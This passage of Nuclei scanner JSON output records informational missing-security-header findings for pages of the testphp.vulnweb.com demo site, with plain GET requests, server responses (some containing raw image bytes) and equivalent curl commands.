ufffd|\\ufffdc]\\ufffdq5\\u0018\\ufffd\\ufffdp\\u0013\\ufffdJ\\ufffd\\u00003\\ufffd\\ufffd]Fhe\\ufffd\\u0018\\ufffd\\ufffdK\\ufffd4\\ufffd%r}\\ufffd\\ufffdW\\ufffd\\ufffdà\\ufffd\\ufffdd\\ufffdh\\ufffd}\\ufffd\\ufffd-\\ufffd\\\\\\ufffd\\ufffd\\u001c\\ufffdE\\ufffd\\ufffd+B\\ufffd+^\\ufffd4j\\ufffd\\ufffd\\u0004\\u0010\\ufffd}\\ufffd\\u0004\\u000cN\\ufffdqb\\ufffd\\u0000Qe?e`6\\ufffd\\u001b~Ȣې\\ufffd6߲v\\ufffd\\ufffd܄\\u0026\\ufffd\\ufffd\\u0014C\\ufffd\\ufffdJ\\ufffdx\\ufffd\\n\\u003enjlԑ\\ufffd\\ufffd5CEY\\ufffd3\\ufffd\\ufffdj=\\ufffd\\nʱ\\ufffd\\ufffdեj\\ufffdб\\ufffd\\u0000N\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffdp\\ufffd\\ufffd\\ufffdk3\\ufffd\\ufffdҾ\\ufffd9\\ufffd\\ufffd\\ufffd}3t\\ufffd\\ufffd\\ufffdψ\\ufffd2J4\\ufffdN\\rvt\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u003e\\ufffdq\\ufffd%\\ufffd\\ufffd\\t\\ufffd\\ufffd\\u001fB\\ufffd\\ufffde\\ufffd\\u001bJ\\ufffd\\u001e\\ufffdQM\\\"(\\ufffd»^,]\\ufffde\\\\FG2k\\ufffdWAC\\ufffd\\r\\ufffd\\ufffd.\\ufffdbPQf\\ufffd\\ufffd\\ufffdt[^\\tP\\ufffd\\ufffdΣ\\ufffd(\\ufffd\\ufffd\\ufffd\\u00126\\ufffd6\\ufffdYlJ\\u0026\\ufffd\\ufffd\\ufffdI\\u0013D\\u003c\\ufffd\\ufffd\\ufffdd\\u0017 \\u0006\\ufffd\\ufffdp2\\ufffd\\u000e\\ufffd\\ufffdm%\\u000e6\\ufffd\\ufffd\\ufffduc\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd}\\ufffd\\ufffd\\u0000\\u001dl*⏝y\\ufffdJ\\u0019\\ufffdK\\ufffdNn\\ufffdN\\u0012x\\ufffd䋤rr%`\\u0006-W\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\ufffd\\ufffdEd(\\ufffd\\u0003!\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdP\\ufffd8\\ufffd\\ufffdk\\ufffd\\ufffd\\u0005)\\ufffd?,\\u0000+\\ufffd\\ufffd\\ufffd;5\\u0012\\ufffd\\u000c2\\ufffd\\ufffd\\ufffd+\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\u0000e\\ufffd2\\ufffd\\t7\\ufffd6-\\\"v\\ufffd\\u0001f\\ufffdd\\ufffd\\u0026ͺXA\\ufffd\\ufffd\\ufffdSh\\u0000~\\ufffd\\\\\\ufffdW\\ufffd\\ufffd\\ufffd%O\\ufffd\\ufffdr\\ufffd\\ufffdc\\u0014\\ufffd\\u0004\\u003eΌ\\u001b\\ufffdCHe\\u0014\\u0000\\u0008\\ufffd\\ufffd\\u0007\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:51.279405236Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586' 'http://testphp.vulnweb.com/pictures/2.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin/1\",\"path\":\"/cgi-bin/1\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin/1\",\"request\":\"GET /cgi-bin/1 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=iso-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:41:39 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//IETF//DTD HTML 2.0//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eNot Found\\u003c/h1\\u003e\\n\\u003cp\\u003eThe requested URL was not found on this server.\\u003c/p\\u003e\\n\\u003chr\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:51.279484309Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51' 'http://testphp.vulnweb.com/cgi-bin/1'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin\",\"path\":\"/cgi-bin\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin\",\"request\":\"GET /cgi-bin HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=iso-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:41:39 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//IETF//DTD HTML 2.0//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003e403 Forbidden\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eForbidden\\u003c/h1\\u003e\\n\\u003cp\\u003eYou don't have permission to access this resource.\\u003c/p\\u003e\\n\\u003chr\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:51.279500234Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testphp.vulnweb.com/cgi-bin'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:52.416299578Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"path\":\"/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"request\":\"GET /Mod_Rewrite_Shop/Details/web-camera-a4tech/2 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:52.416299646Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:52.416349366Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/_mmServerScripts\",\"path\":\"/_mmServerScripts\",\"matched-at\":\"http://testphp.vulnweb.com/_mmServerScripts/\",\"request\":\"GET /_mmServerScripts HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /_mmServerScripts/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /_mmServerScripts/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"MMHTTPDB.php\\\"\\u003eMMHTTPDB.php\\u003c/a\\u003e 11-May-2011 10:27 2111\\r\\n\\u003ca href=\\\"mysql.php\\\"\\u003emysql.php\\u003c/a\\u003e 11-May-2011 10:27 10634\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:52.41636329Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62' 'http://testphp.vulnweb.com/_mmServerScripts'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/1.jpg.tn\",\"path\":\"/pictures/1.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/1.jpg.tn\",\"request\":\"GET /pictures/1.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4355\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:42 GMT\\r\\nEtag: \\\"4dca64a1-1103\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001b\\u0000\\u0000\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0001\\u0005\\u0003\\u0004\\u0007\\u0002\\ufffd\\ufffd\\u00004\\u0010\\u0000\\u0002\\u0001\\u0003\\u0004\\u0001\\u0003\\u0003\\u0003\\u0003\\u0004\\u0001\\u0005\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!1A\\u0006\\u0013Q\\\"a\\ufffd\\u0014q\\ufffd2\\ufffd\\ufffd#BR\\ufffd\\ufffd\\u0016b\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0019\\u0001\\u0000\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0005\\ufffd\\ufffd\\u0000)\\u0011\\u0000\\u0002\\u0002\\u0001\\u0003\\u0002\\u0005\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0004!1\\u0012A\\u0005\\u0013Q\\ufffd\\ufffd2aq\\ufffd\\\"3\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\u003e\\ufffd\\ufffdn?\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd8ԝB\\ufffdw\\u0018Va\\ufffd9\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd]\\ufffd\\ufffd.\\ufffdH\\ufffdn\\t \\ufffd\\ufffdr2s\\ufffd\\u0006\\ufffd\\ufffdP\\u0003z\\ufffd\\ufffd8\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0006$}#\\ufffd\\ufffd\\ufffd\\ufffdW\\t\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{\\ufffd\\ufffdc ʸʮ\\u003c\\ufffd\\ufffd\\ufffd\\ufffd׹Er\\ufffd\\n/\\ufffdI\\ufffd\\ufffd\\ufffdj\\ufffd\\u0026\\ufffd\\ufffd\\ufffddY\\u0019@\\ufffdW\\ufffd\\ufffd#\\ufffdr\\u003e\\ufffdϚ\\ufffd\\ufffdlN^}\\ufffd\\u0015\\ufffd#3(|g\\ufffdp0rpO\\ufffd\\ufffdf\\ufffd\\ufffd}%%\\ufffd\\u0006kIE\\ufffdf\\ufffd\\u0010\\ufffd\\u0003\\ufffd\\ufffd\\u0007\\u001f\\ufffd\\ufffd\\u0006\\ufffdzf\\ufffd\\ufffd^\\ufffdC%Ƕ\\ufffd\\u0019\\u00140;C\\u001d\\ufffd\\u0018\\ufffd?\\ufffd\\ufffd\\ufffdz\\ufffd\\\\\\\\[\\ufffd\\ufffd\\u00025\\ufffdy.\\\\\\ufffd\\u00169۟\\ufffd8\\u001fڮ\\ufffd?\\ufffd\\u0019L3\\\\\\ufffd\\ufffd\\ufffd\\u0019#\\u00110\\ufffd\\\\x\\ufffd\\ufffd8\\ufffd#\\ufffd\\u001b\\ufffdZ\\u0015Ʃ|\\ufffd\\u001e5 夑\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdդ\\ufffd=\\u003e\\ufffd\\u001bI\\ufffdi\\ufffd;\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n2\\u0006\\u0007۳\\ufffdO^(\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffdP\\ufffd.\\ufffd\\ufffd_fEUR\\u0002}9\\ufffd\\ufffdr6\\ufffd\\ufffd\\ufffd\\ufffd\\u003ej\\ufffdg\\ufffd$g\\ufffd\\u0017$\\ufffd\\u000e\\ufffd{\\ufffd\\ufffd[\\ufffdL\\ufffd\\ufffd\\ufffd9\\ufffd,sXi\\u0026\\u0014y\\ufffd\\ufffd\\ufffdT\\ufffdb*E\\u0014VH\\ufffd\\ufffd퍌\\ufffdI,\\ufffd\\ufffd\\ufffdE\\ufffd\\ufffd0\\u0007\\u0007\\ufffd\\ufffd\\ufffd?\\ufffd\\u0015\\ufffd;\\ufffd\\ufffd\\u0017]\\ufffdJ\\ufffdX\\ufffd\\ufffdFd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd$`c\\ufffd\\ufffd2\\ufffd0գ\\ufffd7\\u0016\\ufffdnח\\\"ј;2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdp;'9\\u0018\\ufffdz\\ufffd\\u0014\\ufffd/\\ufffd\\ufffd\\ufffd\\ufffd[)\\ufffd3Z\\ufffdorEY\\u000c\\ufffd\\u001e|\\u0011\\ufffdq\\ufffd|\\u001e\\ufffd\\ufffda\\u001e\\ufffdu$-\\u000bJ\\ufffd\\u001f;\\ufffd\\ufffd\\u0000p\\ufffd\\ufffd\\ufffd\\ufffd\\u0001\\ufffdT\\ufffd\\ufffd\\ufffd\\\"\\ufffdM\\ufffd\\ufffd1\\ufffd06\\ufffdۉ\\u0001O\\u0000\\ufffdg\\u001c\\ufffd\\ufffd\\ufffdN\\ufffd\\u003e\\ufffd\\ufffd\\ufffd\\ufffd,\\ufffd]\\ufffd%ܰ\\ufffd\\ufffdH\\u0010s\\ufffdO\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015S\\ufffdz\\ufffdi\\ufffd%\\ufffd@\\ufffd\\ufffd@G\\ufffd\\u0007`,@#'\\ufffdC\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\ufffd:\\ufffd\\ufffdl\\u0004\\ufffdX\\ufffdX\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd.\\u0014\\ufffdA\\ufffdU\\ufffd\\\\6i\\nٱ\\ufffd\\ufffd-~\\\"2ƂDP\\ufffd\\ufffd`\\ufffd\\u0000\\u0003\\ufffd\\u0001\\ufffd\\ufffdV׿\\u0015\\u0014$\\ufffdm\\ufffd\\ufffdIsr\\ufffd0Uf\\ufffd\\ufffd\\u0014\\u0003\\ufffd\\ufffd.\\ufffdsq\\ufffd\\ufffd\\ufffdg\\ufffd\\ufffd\\ufffd]\\ufffd8\\u001fj\\ufffd\\u0006\\ufffd\\ufffdb\\ufffd/,\\ufffd\\u001e\\ufffd\\ufffd]B\\u0015\\\"\\ufffd\\ufffd\\nS\\ufffdp\\ufffd\\ufffd\\u003e3\\ufffd\\u0000\\\\S\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffd6\\ufffdRI[\\u000258\\ufffd\\ufffd\\u0000\\u000b